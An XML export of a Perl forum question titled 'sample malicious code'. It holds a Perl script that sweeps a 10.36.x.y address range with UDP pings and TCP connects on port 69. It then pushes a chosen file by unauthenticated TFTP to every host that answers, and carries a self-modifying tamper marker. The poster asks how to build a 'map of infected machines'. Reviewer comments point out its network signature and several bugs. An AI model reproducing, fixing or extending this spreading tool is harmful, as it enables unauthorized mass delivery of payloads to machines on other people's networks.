<?xml version="1.0" encoding="windows-1252"?>
<node id="995881" title="sample malicious code" created="2012-09-26 18:46:53" updated="2012-09-26 18:46:53">
<type id="115">
perlquestion</type>
<author id="691673">
swilting</author>
<data>
<field name="doctext">
&lt;p&gt;I am just posting a short message that may be related to malicious code. This text was written without creating the map of infected machines.&lt;/p&gt;
&lt;code&gt;
#!/usr/bin/perl -w
use strict;
use warnings;
use Net::TFTP;
use Net::Ping;
use Data::Dumper;
use FileHandle;

BEGIN
{
    ## Compile-time self-integrity check. The script reads its own source
    ## ($0), and on the first run appends a trailing "#fakessh @='N'" marker
    ## holding the source length; on later runs it refuses to start when the
    ## current length no longer matches the recorded one.
    local $/;                       # slurp mode for the read below
    open (ME,$0);                   # 2-arg open of $0; the result is not checked
    my $me = &lt;ME&gt;;
    close ME;
    unless ($me =~ m/#fakessh \@='\d+'$/) {
        ## First run: write the marker to the file on disk (the script
        ## modifies itself) and to the in-memory copy so the check passes.
        my $length = length $me;
        open (ME, "&gt;&gt;$0");
        print ME "#fakessh \@='$length'";
        close ME;
        $me .= "#fakessh \@='$length'";
    }
    ## Strip the marker again; $1 is the recorded length captured here.
    $me =~ s/#fakessh \@='(\d+)'$//;
    ## NOTE(review): the fixed marker text plus a numeric length is both the
    ## tamper check and a static signature by which this script can be
    ## recognised on disk.
    die "File $0 has changed ?viral infection?\n" unless $1 == length $me;
}
## Command-line arguments: the local file to upload over TFTP and the path
## of the log file that records every probed address.
my $filename = $ARGV[0];
my $lastlogping = $ARGV[1];
usage() unless $filename;
usage() unless $lastlogping;
## Scan state. $ip, $ping, $alive, %alive, $i and the outer $sock are never
## referenced in the scan loop below ($sock is shadowed by a lexical there).
my $RESEAU;            # third octet of the probed 10.36.x.y address
my $IP;                # fourth octet
my $tftp;              # Net::TFTP client for the current host
my $port = 69;         # TCP port tried before the TFTP upload
my %state;             # nested per-timestamp / per-flag counters
my $state;             # never assigned; interpolated into a print below
my $ip;
my $ping;
my $alive;
my $sock;
my %alive;
my $pingerping;        # 1 once the ping branch has run for a host
my $pingersocktftp;    # 1 when the TCP connect to $port succeeded
my $transfertftp;      # 1 when a Net::TFTP session could be opened
my $i;
my $scalarlocaltime;   # timestamp taken at the start of each host probe
my @map;               # flattened view of %state built after the scan

autoflush STDOUT 1;    # indirect-object call; progress output is flushed per print

## Scan loop over 10.36.2-210.2-254: per address it takes a timestamp,
## sends a UDP ping, tries a TCP connect to $port, and where that connect
## succeeds opens a Net::TFTP session and uploads $filename under the same
## name. Each probe is appended to the $lastlogping file.
## NOTE(review): the unauthenticated TFTP put to every host that accepts a
## TCP connect on port 69 is what makes this "malicious code"; from the
## network side it shows as a UDP echo sweep followed by TCP/69 connects
## and TFTP write requests from a single source.
## NOTE(review): IO::Socket::INET is not loaded by this file; presumably one
## of Net::Ping / Net::TFTP pulls it in — verify.
for ($RESEAU = 2; $RESEAU &lt;= 210; $RESEAU=$RESEAU+1)
{
    for ($IP = 2; $IP &lt; 255; $IP = $IP+1)
    {
        ## A non-empty string is always true, so this guard never skips an address.
        if ("10.36.".$RESEAU.".".$IP) 
        { 
	$scalarlocaltime = scalar localtime;
        my $p = Net::Ping-&gt;new('udp');
        print "\nPinging host 10.36.$RESEAU.$IP\n";
        ## The comma operator makes this condition the constant 1; the ping
        ## result is discarded and the branch runs for every address.
        if ($p-&gt;ping("10.36.$RESEAU.$IP"),1) {
        ## If we didn't know it was up, spew that out now..
	$pingerping = 1; $pingersocktftp = 0;$transfertftp = 0;
        ## NOTE(review): inside a hash subscript 10.36.$RESEAU.$IP appears to
        ## parse as the number 10.36 concatenated with $RESEAU and $IP (the
        ## dots are concatenation operators), giving keys like "10.362254"
        ## rather than the dotted address; the same applies to the other
        ## subscripts below. This lookup also omits the $transfertftp level
        ## that the increments use.
        print "10.36.$RESEAU.$IP\twas up at ", scalar localtime, "\n" unless $state{$scalarlocaltime}{$pingerping}{$pingersocktftp}{10.36.$RESEAU.$IP};
        ## Update the number of times we've seen it up
         $state{$scalarlocaltime}{$pingerping}{$pingersocktftp}{$transfertftp}{10.36.$RESEAU.$IP}++;
        ## And let STDOUT know about it, too.
        ##print "alive $scalarlocaltime $pingerping $pingersocktftp 10.36.$RESEAU.$IP time";
	    }
	    
        ## TCP connect to port 69 with a 5 s timeout; a failure only warns.
        my$sock=IO::Socket::INET-&gt;new(
	       PeerAddr=&gt;"10.36.$RESEAU.$IP",                         	       
	       PeerPort=&gt;"$port",         
	       Proto=&gt;"tcp",
	       Timeout=&gt;"5")
	 or warn "Cannot connect port 69 to 10.36.$RESEAU.$IP\n";
	 if (defined $sock) {
	 $pingersocktftp = 1;
	     }
          

	 ## Update the number of times we've seen it up
	 $state{$scalarlocaltime}{$pingerping}{$pingersocktftp}{$transfertftp}{10.36.$RESEAU.$IP}++;
	 ## And let STDOUT know about it, too.
	 ##print " alive ($pingerping $pingersocktftp 10.36.$RESEAU.$IP",scalar localtime;
	 ## The literal key "alive" holds the last dotted address seen for this flag combination.
	  $state{$scalarlocaltime}{$pingerping}{$pingersocktftp}{$transfertftp}{alive} = "10.36.$RESEAU.$IP";
         ##make log map
          if (defined ($sock )){
          $tftp = Net::TFTP-&gt;new("10.36.$RESEAU.$IP", BlockSize =&gt; 1024)
	      or warn "cannot connect tftp serveur\n";
	      if (defined ($tftp)){
		  $transfertftp = 1;
	  ## Update the number of times we've seen it up
	  $state{$scalarlocaltime}{$pingerping}{$pingersocktftp}{$transfertftp}{10.36.$RESEAU.$IP}++;
	  ## And let STDOUT know about it, too.
	  ## $state (the scalar) is never assigned, so it prints as empty here.
	  print "$state $scalarlocaltime  $pingerping  $pingersocktftp 10.36.$RESEAU.$IP transfert start";  
          ## Binary-mode upload of $filename to the remote host, same name.
          $tftp-&gt;binary;
          $tftp-&gt;put($filename,$filename);
	      }
	      }
	  ## Append one line per probed address to the log file; dropping $fh releases the handle.
	  my $fh = FileHandle-&gt;new($lastlogping , "a");
	  if (defined($fh)){
		print $fh " alive $scalarlocaltime $pingerping $pingersocktftp $transfertftp 10.36.$RESEAU.$IP\n";
                undef $fh;
	      }
	    }
	}
    }

          ## NOTE(review): %state in list context flattens to alternating keys
          ## and hashref values, and every subscript reuses the same $_, so
          ## this does not walk the nested structure built above — it looks
          ## like the intended "map" is not what ends up in @map; confirm.
          @map = map { $_ =&gt; ${state{$_}{$_}{$_}{$_}{$_}}} %state;
sub usage {
  ## Print the help text (with $0 interpolated as the program name) to
  ## STDOUT and exit; reached when a command-line argument is missing.
  my $help_text = &lt;&lt;"EO_USAGE";
This program scans a C-class subnet and lists
all machines, before with a udp ping after with a simple nmap scan

and last try to upload via a client tftp

You can also use this program to sort the output.

Usage:	        perl $0 &lt;file_to_transfer&gt; &lt;log_file_ping_ip&gt;
EO_USAGE
  print STDOUT $help_text;
  exit;
}

#fakessh @='3715'
&lt;/code&gt;
&lt;p&gt;I tried to encode a kind of map of the machines with this instruction&lt;/p&gt;
&lt;code&gt;
## NOTE(review): %state flattens to alternating keys and hashref values here,
## and all five subscripts reuse the same $_, so this does not descend the
## nested %state structure — presumably not the intended lookup; confirm.
@map = map { $_ =&gt; ${state{$_}{$_}{$_}{$_}{$_}}} %state;
&lt;/code&gt;
&lt;p&gt;What do you think? What would be the easier and correct technique to encode the map so that the information inside it can be looked up?
&lt;/p&gt;&lt;p&gt;&lt;/p&gt;
&lt;p&gt;What is the best technique? Can you give me an example?&lt;/p&gt;</field>
</data>
</node>
